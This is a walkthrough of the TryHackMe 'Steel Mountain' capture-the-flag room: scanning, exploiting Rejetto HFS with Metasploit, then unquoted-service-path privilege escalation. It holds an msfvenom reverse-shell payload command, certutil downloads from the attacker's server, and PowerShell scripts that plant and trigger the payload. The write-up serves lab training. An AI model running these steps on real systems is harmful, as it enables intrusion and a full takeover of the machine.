This walkthrough covers the Steel Mountain CTF found on TryHackMe. The room is designed to evaluate Windows enumeration skills. We will use Metasploit to gain an initial foothold through a vulnerable HTTP File Server, then winPEAS to enumerate the machine and an unquoted service path to escalate our privileges to Administrator.
Step 1: Nmap
Note: the host does not answer ICMP, so nmap's host discovery would mark it as down. Use the -Pn flag to skip discovery and scan the ports anyway.
nmap -Pn -p- 10.10.0.5 -vvv
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 125
135/tcp open msrpc syn-ack ttl 125
139/tcp open netbios-ssn syn-ack ttl 125
445/tcp open microsoft-ds syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125
5985/tcp open wsman syn-ack ttl 125
8080/tcp open http-proxy syn-ack ttl 125
47001/tcp open winrm syn-ack ttl 125
49152/tcp open unknown syn-ack ttl 125
49153/tcp open unknown syn-ack ttl 125
49154/tcp open unknown syn-ack ttl 125
49155/tcp open unknown syn-ack ttl 125
49156/tcp open unknown syn-ack ttl 125
49169/tcp open unknown syn-ack ttl 125
49170/tcp open unknown syn-ack ttl 125
From this scan we can see two web servers (80 and 8080), SMB (139/445), RDP (3389) and WinRM (5985/47001). One of the web servers will be our attack vector for the initial foothold. Visiting the site on port 80 reveals nothing more than a static employee-of-the-month page; its source code gives us a name, Bill Harper, which is a useful hint for a local username.
Moving on over to port 8080 proves to be a little more useful. Right off the bat, we can tell this is the user panel of an HTTP File Server.
Looking at the source code narrows it down to a Rejetto HTTP File Server. This is great news: this version is vulnerable to a known command-injection RCE (CVE-2014-6287), and Metasploit has a module for it, exploit/windows/http/rejetto_hfs_exec.
Step 2: Metasploit
From here we want to search for the rejetto module in msfconsole and configure its options. Besides RHOSTS and LHOST, remember to set RPORT to 8080: the module defaults to port 80, but this HFS instance listens on 8080.
After properly configuring the module and typing exploit, we get a meterpreter session. Drop into a shell and grab the first flag, located in C:\Users\bill\Desktop; use type user.txt to view it from the command line.
Step 3: Privilege Escalation
To enumerate this machine, we will use winPEAS. You can download the latest release from the PEASS-ng GitHub repository.
Start a Python server:
python3 -m http.server 8000
Upload winPEAS to the victim's C:\Users\bill\Desktop directory using certutil.exe.
certutil.exe -urlcache -f http://10.13.28.215:8000/winPEASany_ofs.exe winPEASany_ofs.exe
Run it by typing winPEASany_ofs.exe.
winPEAS flags an interesting service, AdvancedSystemCareService9. Its binary path is unquoted and contains spaces. When Windows starts such a service, CreateProcess tries each space-delimited prefix of the path with .exe appended before it reaches the real binary, so a file named "Advanced.exe" placed in C:\Program Files (x86)\IObit\ is executed instead of the legitimate service binary, with the service's privileges. Two conditions must hold for this to be exploitable: we need write access to that directory, and we must be able to restart the service (or wait for a reboot if its start mode is automatic). winPEAS reports both, and here both are satisfied, so we will drop a reverse shell there.
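As an added example (not code from the original walkthrough or from winPEAS), the script below reproduces the unquoted-service-path check by hand so the AdvancedSystemCareService9 finding can be re-verified from the foothold shell. For every service whose binary path is unquoted and contains a space, it lists the executables Windows would try, in order, before reaching the real binary, and tests whether the current user can create a file in each candidate directory. The IObit path mentioned in the comments is an assumed illustration; the function names are my own.

```powershell
# Added example: manual equivalent of the winPEAS unquoted-service-path check.
# Function names are hypothetical; the IObit path in the comments is assumed.

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Path)
    # Create and immediately delete a randomly named file. Reading the ACL alone
    # misses deny entries and inherited rights, so an actual write is the honest test.
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path -Path $Path -ChildPath ([System.IO.Path]::GetRandomFileName())
    try {
        New-Item -Path $probe -ItemType File -ErrorAction Stop | Out-Null
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' } |   # quoted paths are safe
        ForEach-Object {
            $svc = $_
            # Keep only the executable; arguments such as " -service" follow the .exe.
            if ($svc.PathName -match '^(?<exe>.*?\.exe)') { $exe = $Matches['exe'] } else { return }
            if ($exe -notmatch ' ') { return }   # no space in the unquoted part, nothing to hijack

            # Assumed example: 'C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe'
            # is tried as C:\Program.exe, then C:\Program Files.exe,
            # then C:\Program Files (x86)\IObit\Advanced.exe, then the real path.
            $parts = $exe -split ' '
            for ($i = 1; $i -lt $parts.Count; $i++) {
                $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
                $dir       = Split-Path -Path $candidate -Parent
                [PSCustomObject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName     # the account our payload would run as
                    StartMode = $svc.StartMode     # Auto means a reboot also triggers it
                    PathName  = $svc.PathName
                    Candidate = $candidate
                    Writable  = Test-DirectoryWritable -Path $dir
                }
            }
        }
}

# Only the exploitable cases matter: a writable candidate directory on a service
# that runs as a privileged account.
Get-UnquotedServicePath |
    Where-Object { $_.Writable } |
    Format-Table -AutoSize Service, RunsAs, StartMode, Candidate
```

Run it from the meterpreter shell after `powershell -ep bypass`, or paste it into an interactive PowerShell. The Writable column is what decides the attack; whether you can actually restart the service is a separate check (try it, or inspect the service's DACL), which winPEAS also reports.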
Let's fire up msfvenom and generate a payload.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.13.28.215 LPORT=1337 -f exe -o Advanced.exe
Note that windows/x64/shell_reverse_tcp is a stageless payload, which is why a plain netcat listener is enough to catch it; the staged windows/x64/shell/reverse_tcp would need a Metasploit handler instead.
Start up the Python web server again and transfer the payload over with certutil, exactly as we did for winPEAS.
Move it to "C:\Program Files (x86)\IObit\", and be sure to put the file path in quotes because of the spaces.
Now we want to stop the AdvancedSystemCareService9 service.
Start a netcat listener to catch the reverse shell.
nc -lvnp 1337
Start the AdvancedSystemCareService9 service back up.
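As an added example (not the original walkthrough's commands), here are the steps above collected into one PowerShell script run from the low-privileged foothold shell on the victim. The attacker address and port, service name, payload name and target directory are taken from the walkthrough; the temporary download location and the order of operations are my assumptions. One PowerShell trap worth knowing: `sc` is an alias for Set-Content, so the service control tool must be called as sc.exe.

```powershell
# Added example: unquoted-service-path exploitation, victim side.
# Values below come from the walkthrough; $env:TEMP as a staging dir is assumed.
$Attacker  = 'http://10.13.28.215:8000'
$Service   = 'AdvancedSystemCareService9'
$Payload   = 'Advanced.exe'
$TargetDir = 'C:\Program Files (x86)\IObit'

# 1. Confirm the service is still unquoted and see which account it runs as.
#    'sc' alone would invoke Set-Content in PowerShell, so use sc.exe explicitly.
sc.exe qc $Service

# 2. Fetch the msfvenom payload from the attacker's Python web server
#    (python3 -m http.server 8000 on the attacker, as earlier in the walkthrough).
certutil.exe -urlcache -f "$Attacker/$Payload" "$env:TEMP\$Payload"

# 3. Drop it where CreateProcess will find it before the real binary.
#    Join-Path handles the spaces in the directory name, so no manual quoting is needed.
Copy-Item -Path "$env:TEMP\$Payload" -Destination (Join-Path $TargetDir $Payload) -ErrorAction Stop

# 4. Restart the service with the netcat listener (nc -lvnp 1337) already running.
#    Start-Service will report a timeout (error 1053) because Advanced.exe never
#    registers with the Service Control Manager; by then the payload has already
#    been executed as the service account and the reverse shell has connected.
Stop-Service  -Name $Service -Force -ErrorAction SilentlyContinue
Start-Service -Name $Service -ErrorAction SilentlyContinue
```

Because the payload is not a real service binary, the Service Control Manager may terminate it once the start timeout expires, so the reverse shell can die after roughly half a minute. If that happens, spawn a separate process from the shell as soon as it lands (another reverse shell, or a persistent process) rather than working inside the service-spawned one.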
Step 4: Root
Pwned! From here we can grab the last flag found in C:\Users\Administrator\Desktop.
I hope you enjoyed this walkthrough of the Steel Mountain CTF found on TryHackMe. Happy Hacking.